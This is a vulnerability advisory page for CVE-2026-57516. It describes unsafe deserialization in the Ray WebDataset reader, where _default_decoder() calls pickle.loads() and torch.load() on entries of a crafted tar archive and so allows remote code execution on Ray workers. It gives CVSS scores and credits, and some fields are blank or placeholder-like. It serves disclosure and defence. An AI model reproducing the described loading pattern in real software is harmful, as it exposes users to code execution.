Remote Code Execution Vulnerability in Ray WebDataset Reader
CVE-2026-57516
8.6HIGH
What is CVE-2026-57516?
Ray versions prior to 2.56.0 are affected by an unsafe deserialization vulnerability in the WebDataset reader. Attackers can exploit this flaw by submitting a crafted tar archive to the read_webdataset() function, enabling remote code execution. This is facilitated by the _default_decoder() function in webdataset_datasource.py, which indiscriminately calls pickle.loads() on .pkl/.pickle entries and torch.load() on .pt/.pth entries. As a result, arbitrary code can be executed within Ray remote workers for every instance that processes the malicious archive, posing significant security risks.
Affected Version(s)
Ray 0
References
CVSS V4
Score:
8.6
Severity:
HIGH
Confidentiality:
High
Integrity:
High
Availability:
High
Attack Vector:
Network
Attack Complexity:
Low
Attack Required:
None
Privileges Required:
Undefined
User Interaction:
Unknown
Timeline
Vulnerability published
Vulnerability Reserved
Credit
jeremysommerfeld8910-cpu
shakevsky
alexchenai
SSJCorpSec
thesecguy45
sfwani
Rahul Karne
